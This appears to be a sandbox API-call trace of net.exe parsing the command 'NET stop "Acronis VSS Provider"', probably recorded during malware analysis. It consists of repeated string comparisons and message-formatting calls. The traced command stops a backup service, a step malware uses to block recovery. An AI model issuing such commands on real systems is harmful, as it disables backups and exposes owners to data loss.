_wcsnicmp (_String1="NET stop ΓÇ£Acronis VSS ProviderΓÇ¥", _String2="NET TIME\r\n\r\n[\\\\computername | /DOMA", _MaxCount=0x23) returned -1 [0218.185] LocalFree (hMem=0x585630) returned 0x0 [0218.185] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0x184 [0218.185] _wcsnicmp (_String1="NET stop ΓÇ£Acronis VSS ProviderΓÇ¥", _String2="NET USE\r\n[devicename | *] [\\\\comput", _MaxCount=0x23) returned -2 [0218.185] LocalFree (hMem=0x585630) returned 0x0 [0218.185] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0xc7 [0218.185] _wcsnicmp (_String1="NET stop ΓÇ£Acronis VSS ProviderΓÇ¥", _String2="NET USER\r\n[username [password | *] ", _MaxCount=0x23) returned -2 [0218.185] LocalFree (hMem=0x585630) returned 0x0 [0218.185] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0x47 [0218.185] _wcsnicmp (_String1="NET stop ΓÇ£Acronis VSS ProviderΓÇ¥", _String2="NET VIEW\r\n[\\\\computername [/CACHE] ", _MaxCount=0x23) returned -3 [0218.185] LocalFree (hMem=0x585630) returned 0x0 [0218.185] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0xc2 [0218.185] _wcsnicmp (_String1="NET stop ΓÇ£Acronis VSS ProviderΓÇ¥", _String2="NET\r\n [ ACCOUNTS | COMPUTER | CO", _MaxCount=0x23) returned 19 [0218.185] LocalFree (hMem=0x585630) returned 0x0 [0218.185] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0x319 [0218.185] _wcsnicmp (_String1="NET stop ΓÇ£Acronis VSS ProviderΓÇ¥", _String2="SERVICES\r\nNET START can be used to ", _MaxCount=0x23) returned -5 [0218.185] LocalFree (hMem=0x585630) returned 0x0 [0218.185] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0x483 [0218.185] _wcsnicmp (_String1="NET stop ΓÇ£Acronis VSS ProviderΓÇ¥", _String2="SYNTAX\r\nThe following conventions a", _MaxCount=0x23) returned -5 [0218.185] LocalFree (hMem=0x585630) returned 0x0 [0218.185] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0xa86 [0218.185] _wcsnicmp (_String1="NET stop ΓÇ£Acronis VSS ProviderΓÇ¥", _String2="NAMES\r\nThe following types of names", _MaxCount=0x23) returned 4 [0218.185] LocalFree (hMem=0x585630) returned 0x0 [0218.185] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0x54 [0218.185] _wcsnicmp (_String1="NET stop ΓÇ£Acronis VSS ProviderΓÇ¥", _String2="\r\nFor more information on tools see", _MaxCount=0x23) returned 97 [0218.185] LocalFree (hMem=0x585630) returned 0x0 [0218.186] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0xad [0218.186] _wcsnicmp (_String1="NET stop ΓÇ£Acronis VSS", _String2="NET ACCOUNTS\r\n[/FORCELO", _MaxCount=0x17) returned 18 [0218.186] LocalFree (hMem=0x585630) returned 0x0 [0218.186] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0x2e [0218.186] _wcsnicmp (_String1="NET stop ΓÇ£Acronis VSS", _String2="NET COMPUTER\r\n\\\\compute", _MaxCount=0x17) returned 16 [0218.186] LocalFree (hMem=0x585630) returned 0x0 [0218.186] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0x7d [0218.186] _wcsnicmp (_String1="NET stop ΓÇ£Acronis VSS", _String2="NET CONFIG SERVER\r\n[/AU", _MaxCount=0x17) returned 16 [0218.186] LocalFree (hMem=0x585630) returned 0x0 [0218.186] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0x26 [0218.186] _wcsnicmp (_String1="NET stop ΓÇ£Acronis VSS", _String2="NET CONFIG\r\n[SERVER | W", _MaxCount=0x17) returned 16 [0218.186] LocalFree (hMem=0x585630) returned 0x0 [0218.186] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0x19 [0218.186] _wcsnicmp (_String1="NET stop ΓÇ£Acronis VSS", _String2="NET CONTINUE\r\nservice\r\n", _MaxCount=0x17) returned 16 [0218.186] LocalFree (hMem=0x585630) returned 0x0 [0218.186] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0x1b [0218.186] _wcsnicmp (_String1="NET stop ΓÇ£Acronis VSS", _String2="NET FILE\r\n[id [/CLOSE]]", _MaxCount=0x17) returned 13 [0218.186] LocalFree (hMem=0x585630) returned 0x0 [0218.186] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0xbe [0218.186] _wcsnicmp (_String1="NET stop ΓÇ£Acronis VSS", _String2="NET GROUP\r\n[groupname [", _MaxCount=0x17) returned 12 [0218.186] LocalFree (hMem=0x585630) returned 0x0 [0218.186] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0x33 [0218.186] _wcsnicmp (_String1="NET stop ΓÇ£Acronis VSS", _String2="NET HELP\r\ncommand\r\n ", _MaxCount=0x17) returned 11 [0218.186] LocalFree (hMem=0x585630) returned 0x0 [0218.186] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0x19 [0218.186] _wcsnicmp (_String1="NET stop ΓÇ£Acronis VSS", _String2="NET HELPMSG\r\nmessage#\r\n", _MaxCount=0x17) returned 11 [0218.186] LocalFree (hMem=0x585630) returned 0x0 [0218.186] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0xc1 [0218.186] _wcsnicmp (_String1="NET stop ΓÇ£Acronis VSS", _String2="NET LOCALGROUP\r\n[groupn", _MaxCount=0x17) returned 7 [0218.186] LocalFree (hMem=0x585630) returned 0x0 [0218.186] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0x16 [0218.186] _wcsnicmp (_String1="NET stop ΓÇ£Acronis VSS", _String2="NET PAUSE\r\nservice\r\n\r\n", _MaxCount=0x17) returned 3 [0218.186] LocalFree (hMem=0x585630) returned 0x0 [0218.186] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0x33 [0218.186] _wcsnicmp (_String1="NET stop ΓÇ£Acronis VSS", _String2="NET SESSION\r\n[\\\\compute", _MaxCount=0x17) returned 15 [0218.186] LocalFree (hMem=0x585630) returned 0x0 [0218.186] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0x234 [0218.187] _wcsnicmp (_String1="NET stop ΓÇ£Acronis VSS", _String2="NET SHARE\r\nsharename\r\n ", _MaxCount=0x17) returned 12 [0218.187] LocalFree (hMem=0x585630) returned 0x0 [0218.187] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0x13 [0218.187] _wcsnicmp (_String1="NET stop ΓÇ£Acronis VSS", _String2="NET START BROWSER\r\n", _MaxCount=0x17) returned 14 [0218.187] LocalFree (hMem=0x585630) returned 0x0 [0218.187] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0x14 [0218.187] _wcsnicmp (_String1="NET stop ΓÇ£Acronis VSS", _String2="NET START CLIPBOOK\r\n", _MaxCount=0x17) returned 14 [0218.187] LocalFree (hMem=0x585630) returned 0x0 [0218.187] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0x14 [0218.187] _wcsnicmp (_String1="NET stop ΓÇ£Acronis VSS", _String2="NET START EVENTLOG\r\n", _MaxCount=0x17) returned 14 [0218.187] LocalFree (hMem=0x585630) returned 0x0 [0218.187] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0x15 [0218.187] _wcsnicmp (_String1="NET stop ΓÇ£Acronis VSS", _String2="NET START MESSENGER\r\n", _MaxCount=0x17) returned 14 [0218.187] LocalFree (hMem=0x585630) returned 0x0 [0218.187] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0x15 [0218.187] _wcsnicmp (_String1="NET stop ΓÇ£Acronis VSS", _String2="NET START NET LOGON\r\n", _MaxCount=0x17) returned 14 [0218.187] LocalFree (hMem=0x585630) returned 0x0 [0218.187] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0x16 [0218.187] _wcsnicmp (_String1="NET stop ΓÇ£Acronis VSS", _String2="NET START RPCLOCATOR\r\n", _MaxCount=0x17) returned 14 [0218.187] LocalFree (hMem=0x585630) returned 0x0 [0218.187] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0x11 [0218.187] _wcsnicmp (_String1="NET stop ΓÇ£Acronis VSS", _String2="NET START RPCSS\r\n", _MaxCount=0x17) returned 14 [0218.187] LocalFree (hMem=0x585630) returned 0x0 [0218.187] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0x14 [0218.187] _wcsnicmp (_String1="NET stop ΓÇ£Acronis VSS", _String2="NET START SCHEDULE\r\n", _MaxCount=0x17) returned 14 [0218.187] LocalFree (hMem=0x585630) returned 0x0 [0218.187] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0x12 [0218.187] _wcsnicmp (_String1="NET stop ΓÇ£Acronis VSS", _String2="NET START SERVER\r\n", _MaxCount=0x17) returned 14 [0218.187] LocalFree (hMem=0x585630) returned 0x0 [0218.187] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0xf [0218.187] _wcsnicmp (_String1="NET stop ΓÇ£Acronis VSS", _String2="NET START UPS\r\n", _MaxCount=0x17) returned 14 [0218.187] LocalFree (hMem=0x585630) returned 0x0 [0218.187] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0x17 [0218.187] _wcsnicmp (_String1="NET stop ΓÇ£Acronis VSS", _String2="NET START WORKSTATION\r\n", _MaxCount=0x17) returned 14 [0218.187] LocalFree (hMem=0x585630) returned 0x0 [0218.187] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0x18 [0218.187] _wcsnicmp (_String1="NET stop ΓÇ£Acronis VSS", _String2="NET START\r\n[service]\r\n\r", _MaxCount=0x17) returned 14 [0218.188] LocalFree (hMem=0x585630) returned 0x0 [0218.188] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0x2a [0218.188] _wcsnicmp (_String1="NET stop ΓÇ£Acronis VSS", _String2="NET STATISTICS\r\n[WORKST", _MaxCount=0x17) returned 14 [0218.188] LocalFree (hMem=0x585630) returned 0x0 [0218.188] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0x15 [0218.188] _wcsnicmp (_String1="NET stop ΓÇ£Acronis VSS", _String2="NET STOP\r\nservice\r\n\r\n", _MaxCount=0x17) returned 19 [0218.188] LocalFree (hMem=0x585630) returned 0x0 [0218.188] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0x58 [0218.188] _wcsnicmp (_String1="NET stop ΓÇ£Acronis VSS", _String2="NET TIME\r\n\r\n[\\\\computer", _MaxCount=0x17) returned -1 [0218.188] LocalFree (hMem=0x585630) returned 0x0 [0218.188] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0x184 [0218.188] _wcsnicmp (_String1="NET stop ΓÇ£Acronis VSS", _String2="NET USE\r\n[devicename | ", _MaxCount=0x17) returned -2 [0218.188] LocalFree (hMem=0x585630) returned 0x0 [0218.188] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0xc7 [0218.188] _wcsnicmp (_String1="NET stop ΓÇ£Acronis VSS", _String2="NET USER\r\n[username [pa", _MaxCount=0x17) returned -2 [0218.188] LocalFree (hMem=0x585630) returned 0x0 [0218.188] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0x47 [0218.188] _wcsnicmp (_String1="NET stop ΓÇ£Acronis VSS", _String2="NET VIEW\r\n[\\\\computerna", _MaxCount=0x17) returned -3 [0218.188] LocalFree (hMem=0x585630) returned 0x0 [0218.188] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0xc2 [0218.188] _wcsnicmp (_String1="NET stop ΓÇ£Acronis VSS", _String2="NET\r\n [ ACCOUNTS | C", _MaxCount=0x17) returned 19 [0218.188] LocalFree (hMem=0x585630) returned 0x0 [0218.188] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0x319 [0218.188] _wcsnicmp (_String1="NET stop ΓÇ£Acronis VSS", _String2="SERVICES\r\nNET START can", _MaxCount=0x17) returned -5 [0218.188] LocalFree (hMem=0x585630) returned 0x0 [0218.188] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0x483 [0218.188] _wcsnicmp (_String1="NET stop ΓÇ£Acronis VSS", _String2="SYNTAX\r\nThe following c", _MaxCount=0x17) returned -5 [0218.188] LocalFree (hMem=0x585630) returned 0x0 [0218.188] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0xa86 [0218.188] _wcsnicmp (_String1="NET stop ΓÇ£Acronis VSS", _String2="NAMES\r\nThe following ty", _MaxCount=0x17) returned 4 [0218.188] LocalFree (hMem=0x585630) returned 0x0 [0218.188] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0x54 [0218.188] _wcsnicmp (_String1="NET stop ΓÇ£Acronis VSS", _String2="\r\nFor more information ", _MaxCount=0x17) returned 97 [0218.188] LocalFree (hMem=0x585630) returned 0x0 [0218.188] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0xad [0218.189] _wcsnicmp (_String1="NET stop ΓÇ£Acronis", _String2="NET ACCOUNTS\r\n[/FOR", _MaxCount=0x13) returned 18 [0218.189] LocalFree (hMem=0x585630) returned 0x0 [0218.189] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0x2e [0218.189] _wcsnicmp (_String1="NET stop ΓÇ£Acronis", _String2="NET COMPUTER\r\n\\\\com", _MaxCount=0x13) returned 16 [0218.189] LocalFree (hMem=0x585630) returned 0x0 [0218.189] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0x7d [0218.189] _wcsnicmp (_String1="NET stop ΓÇ£Acronis", _String2="NET CONFIG SERVER\r\n", _MaxCount=0x13) returned 16 [0218.189] LocalFree (hMem=0x585630) returned 0x0 [0218.189] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0x26 [0218.189] _wcsnicmp (_String1="NET stop ΓÇ£Acronis", _String2="NET CONFIG\r\n[SERVER", _MaxCount=0x13) returned 16 [0218.189] LocalFree (hMem=0x585630) returned 0x0 [0218.189] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0x19 [0218.189] _wcsnicmp (_String1="NET stop ΓÇ£Acronis", _String2="NET CONTINUE\r\nservi", _MaxCount=0x13) returned 16 [0218.189] LocalFree (hMem=0x585630) returned 0x0 [0218.189] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0x1b [0218.189] _wcsnicmp (_String1="NET stop ΓÇ£Acronis", _String2="NET FILE\r\n[id [/CLO", _MaxCount=0x13) returned 13 [0218.189] LocalFree (hMem=0x585630) returned 0x0 [0218.189] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0xbe [0218.189] _wcsnicmp (_String1="NET stop ΓÇ£Acronis", _String2="NET GROUP\r\n[groupna", _MaxCount=0x13) returned 12 [0218.189] LocalFree (hMem=0x585630) returned 0x0 [0218.189] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0x33 [0218.189] _wcsnicmp (_String1="NET stop ΓÇ£Acronis", _String2="NET HELP\r\ncommand\r\n", _MaxCount=0x13) returned 11 [0218.189] LocalFree (hMem=0x585630) returned 0x0 [0218.189] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0x19 [0218.189] _wcsnicmp (_String1="NET stop ΓÇ£Acronis", _String2="NET HELPMSG\r\nmessag", _MaxCount=0x13) returned 11 [0218.189] LocalFree (hMem=0x585630) returned 0x0 [0218.189] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0xc1 [0218.189] _wcsnicmp (_String1="NET stop ΓÇ£Acronis", _String2="NET LOCALGROUP\r\n[gr", _MaxCount=0x13) returned 7 [0218.189] LocalFree (hMem=0x585630) returned 0x0 [0218.189] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0x16 [0218.189] _wcsnicmp (_String1="NET stop ΓÇ£Acronis", _String2="NET PAUSE\r\nservice\r", _MaxCount=0x13) returned 3 [0218.189] LocalFree (hMem=0x585630) returned 0x0 [0218.189] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0x33 [0218.189] _wcsnicmp (_String1="NET stop ΓÇ£Acronis", _String2="NET SESSION\r\n[\\\\com", _MaxCount=0x13) returned 15 [0218.189] LocalFree (hMem=0x585630) returned 0x0 [0218.189] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0x234 [0218.189] _wcsnicmp (_String1="NET stop ΓÇ£Acronis", _String2="NET SHARE\r\nsharenam", _MaxCount=0x13) returned 12 [0218.189] LocalFree (hMem=0x585630) returned 0x0 [0218.190] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0x13 [0218.190] _wcsnicmp (_String1="NET stop ΓÇ£Acronis", _String2="NET START BROWSER\r\n", _MaxCount=0x13) returned 14 [0218.190] LocalFree (hMem=0x585630) returned 0x0 [0218.190] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0x14 [0218.190] _wcsnicmp (_String1="NET stop ΓÇ£Acronis", _String2="NET START CLIPBOOK\r", _MaxCount=0x13) returned 14 [0218.190] LocalFree (hMem=0x585630) returned 0x0 [0218.190] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0x14 [0218.190] _wcsnicmp (_String1="NET stop ΓÇ£Acronis", _String2="NET START EVENTLOG\r", _MaxCount=0x13) returned 14 [0218.190] LocalFree (hMem=0x585630) returned 0x0 [0218.190] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0x15 [0218.190] _wcsnicmp (_String1="NET stop ΓÇ£Acronis", _String2="NET START MESSENGER", _MaxCount=0x13) returned 14 [0218.190] LocalFree (hMem=0x585630) returned 0x0 [0218.190] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="瘰X⡋瓢,嘰X,") returned 0x15 [0218.190] _wcsnicmp (_String1="NET stop ΓÇ£Acronis", _String2="NET START NET LOGON", _MaxCount=0x13) returned 14 [0218.190] LocalFree (hMem=0x587630) returned 0x0 [0218.190] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="阰X⡋瓢,瘰X,") returned 0x16 [0218.190] _wcsnicmp (_String1="NET stop ΓÇ£Acronis", _String2="NET START RPCLOCATO", _MaxCount=0x13) returned 14 [0218.190] LocalFree (hMem=0x589630) returned 0x0 [0218.190] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, 